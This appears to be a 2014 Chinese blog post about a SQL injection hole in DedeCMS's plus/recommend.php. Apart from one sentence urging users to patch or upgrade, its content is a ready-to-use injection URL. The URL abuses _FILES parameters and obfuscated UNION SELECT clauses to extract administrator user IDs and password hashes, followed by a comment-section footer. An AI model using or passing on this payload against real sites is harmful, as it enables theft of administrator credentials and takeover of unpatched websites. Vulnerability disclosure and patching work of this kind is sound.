DedeCMS recommend.php 注入漏洞

dedecms老版本还有这个漏斗,希望可以补上,或者更新到最新的官网版本。

http://网址/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\’and+char(@`’`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat(0x3C6162633E,group_concat(0x7C,userid,0x3a,pwd,0x7C),0x3C2F6162633E),5,6,7,8,9%20from%20`%23@__admin`%23″;



本文固定链接: http://20tc.com/dedecms-recommend-php.html | TC的博客

该日志由 TC 于2014年07月27日发表在 Dedecms 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: DedeCMS recommend.php 注入漏洞 | TC的博客
关键字:

DedeCMS recommend.php 注入漏洞:目前有1 条留言

  1. 沙发
    米奇 China Google Chrome Windows :

    的淡淡的淡淡的淡淡的淡淡的

    2015-06-26 上午 1:15 [回复]

发表评论


*

快捷键:Ctrl+Enter

无觅相关文章插件,快速提升流量